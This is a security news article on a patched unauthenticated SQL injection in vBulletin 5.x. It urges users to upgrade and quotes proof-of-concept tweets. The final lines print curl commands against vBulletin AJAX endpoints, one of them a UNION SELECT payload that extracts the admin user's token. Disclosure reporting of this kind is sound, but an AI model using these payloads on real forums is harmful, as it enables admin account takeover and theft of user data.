vBulletin Fixes Critical Security Vulnerabilities - Bug May Disclosed
unauthenticated SQLinjection bug was found in vBulletin prior to 5.5
vBulletin powers more than 100,000 websites, considering its popularity, hackers may jump to exploit the vulnerability soon, users are recommended to patch soon.
A security researcher at Ambionics Charles Fol found this bug. At the meantime, Charles had not disclosed the full details of the vulnerability but he mentioned that details will be published in the SSTIC conference from June 3-5.
According to the National Vulnerability Database (NVD), the access control vulnerability affects versions prior to 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1.
Last year, a hacker publicly disclosed an unpatched vBulletin forum software pre-auth RCE Zero-day Exploit, which was exploited many cyber crooks that affects many popular forum. With that unpatched bug, hackers accessed sensitive details such as username, name, e-mail address, last IP used to access the forums.
So if you are using a version of vBulletin 5 Connect prior to 5.5.6, it is strongly recommended to upgrade with newer versions.
Bug May get Disclosed
As the details of the bug weren't disclosed by the researcher, but there are many people who can quickly mark the vulnerability by reverse-engineering the fix pushed by vBulletin team.
So for the same, a guy going with the twitter handle @Zenofex had tweeted some proof-of-concept for some bugs related for the same, assuming VBulletin team patched.
According to Zenofex, vBulletin team patched unauthenticated SQLinjection bug in vBulletin 5.6.1
You can check the below tweet for the POC of the bug.
Looks like vB was actually patching a SQL injection vuln with the latest round of patches in vBulletin 5.6.1. Here's an unauthenticated SQLi PoC— Amir Etemadieh (@Zenofex) May 12, 2020
curl "http://localhost/vb5/ajax/api/content_attach/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi"
Get vBulletin 5.6.1 admin token POC— Amir Etemadieh (@Zenofex) May 12, 2020
curl "http://SITE/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--"